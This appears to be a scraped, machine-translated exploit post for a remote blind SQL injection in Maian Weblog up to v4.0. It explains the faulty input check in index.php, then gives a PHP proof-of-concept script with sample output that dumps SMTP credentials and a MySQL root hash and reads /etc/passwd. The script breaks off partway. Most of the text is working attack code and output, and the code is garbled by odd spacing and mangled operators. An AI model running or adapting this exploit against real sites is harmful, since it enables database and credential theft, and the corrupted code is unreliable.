Maian weblog is a free blog system. If maian weblog is earlier than index. php In analyticdb 4.0, the SQL injection vulnerability may cause sensitive information leakage.
[+] Info:
~~~~~~~~~
Maian weblog <= v4.0 remote blind SQL injection exploit
[+] Poc:
~~~~~~~~~
View sourceprint? 001 <? Php
002 /*
003 maian weblog <= v4.0 Remote Blind SQL Injection Exploit
004 vendor: http://www.maianscriptworld.co.uk/
005 Thanks to Johannes Dahse: http://bit.ly/dpQXMK
006
007 Explanation:
008 Lines 335-341 of the index. php we see this if statement that concerns
009 our variable $ B _post.
010
011 // Check month and year vars...
012 // If they don't equal 0, are they numeric ?..
013 if ($ B _post = 0 &&! Ctype_digit ($ B _post ))
014 {
015 header ("Location: index. php ");
016 exit;
017}
018
019 This if statement is suppose to prevent the SQL Injection vulnerability.
020 However the logic implimented is incorrect, as there will never be a situation
021 where the $ B _post variable that we control will ever be a 0 and a string value.
022
023 So a simple fix to remediate this issue becomes clear, instead of an &,
024 author was suppose to use an |. o. O
025
026 Further down in the index. php page on lines 348-361, we see the location of
027 actual vulnerable code.
028
029 $ q_blog = mysql_query ("SELECT * FROM". $ database [prefix]. "blogs
030 WHERE id = $ B _post
031 LIMIT 1
032 ") or die (mysql_error ());
033 $ BLOG = mysql_fetch_object ($ q_blog );
034
035 // At this point, lets see if the last query fetched anything ..
036 // If it didn't, blog id is invalid. Might be someone bookmarked an old link ..
037 // If no data, redirect to homepage ..
038 if (mysql_num_rows ($ q_blog) = 0)
039 {
040 header ("Location: index. php ");
041 exit;
042}
043
044 The page redirects after the query is executed. This way you probably wont spot
045 bug in your browser from a blackbox view :). No urldecode () so we cant bypass
046 magic_quotes_gpc and the admin credentials are not stored in the database. doh.
047
048 Using <or> wocould make the PoC a little more efficient, but oh well: 0)
049 Assuming some stars are aligned, the PoC will make well over 11,000 requests...
050 [mr_me @ pluto maian_weblog] $ php PoC. php-t 192.168.56.101-d/maian_weblog/-p 127.0.0.1: 8080
051
052 -------------------------------------------------------
053 maian weblog <= v4.0 Remote Blind SQL Injection Explo! T
054 by mr_me-https://net-ninja.net/
055 -------------------------------------------------------
056
057 (+) Setting the proxy to Fig: 8080
058 (+) Getting basic database information
059 (+) Database version-> 5.1.41-3ubuntu12. 9
060 (+) Database name-> maian_weblog
061 (+) Database user-> root @ localhost
062 (+) SMTP details found!
063 (+) Getting SMTP host: user: pass-> localhost: maianmail: password
064 (+) Access to MySQL database successful, dumping hash!
065 (+) MySQL user: pass-> root: * EE4E2773D7530819563F0DC6FCE27446A51C9413
066 (!) Access to load_file (), wanna play? (Y/n): y
067
068 (+) Please enter the file (q to quit):/etc/shadow
069 (-) File doesnt exist/no access.
070 (+) Please enter the file (q to quit):/etc/passwd
071 (!) Dumping the/etc/passwd file, hold onto your knickers!
072 root: x: 0: 0: root:/bin/bash
073 daemon: x: 1: 1: daemon :......
074 */
075
076 print_r ("
077 -------------------------------------------------------
078 maian weblog <= v4.0 Remote Blind SQL Injection Explo! T
079 by mr_me-https://net-ninja.net/
080 -------------------------------------------------------
081 ");
082
083 if ($ argc <3 ){
084 print_r ("
085 -----------------------------------------------------------------------------
086 Usage: php ". $ argv [0]."-t
087 host: target server (ip/hostname)
088 path: directory path to wordpress
089 Options:
090-p [ip: port]: specify a proxy
091 Example:
092 php ". $ argv [0]."-t 192.168.1.5-d/webapps/wp/-p 127.0.0.1: 8080
093 php ". $ argv [0]."-t 192.168.1.5-d/webapps/wp/
094 -----------------------------------------------------------------------------
095 "); die ;}
096
097 error_reporting (7 );
098 ini_set ("max_execution_time", 0 );
099 ini_set ("default_socket_timeout", 5 );
100
101 $ proxy_regex = "(d {1, 3}. d {1, 3}. d {1, 3}. d {1, 3 })";
102
103 function setArgs ($ argv ){
104 $ _ ARG = array ();
105 foreach ($ argv as $ arg ){
106 if (ereg ("-- ([^ =] +) = (. *)", $ arg, $ reg )){
107 $ _ ARG [$ reg [1] = $ reg [2];
108} elseif (ereg ("^-([a-zA-Z0-9])", $ arg, $ reg )){
109 $ _ ARG [$ reg [1] = "true ";
110} else {
111 $ _ ARG ["input"] [] = $ arg;
112}
113